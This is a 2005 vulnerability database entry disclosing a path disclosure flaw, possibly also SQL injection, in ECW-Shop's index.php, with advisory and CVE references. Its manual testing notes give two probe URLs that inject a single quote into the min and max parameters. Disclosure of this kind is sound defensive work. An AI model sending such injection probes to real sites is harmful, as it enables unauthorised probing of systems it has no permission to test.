ECW-Shop index.php Multiple Variable Path Disclosure

2005-08-15T05:59:09
ID OSVDB:18804
Type osvdb
Reporter OSVDB
Modified 2005-08-15T05:59:09

Description

Technical Description

This vulnerability may potentially be more serious allowing the manipulation of SQL queries.

Manual Testing Notes

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1 http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='

References:

Vendor URL: http://www.soft4e.com/ Security Tracker: 1014734 Secunia Advisory ID:16459 Related OSVDB ID: 18805 Related OSVDB ID: 18806 Other Advisory URL: http://www.nobytes.com/nobytes9.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0213.html CVE-2005-2621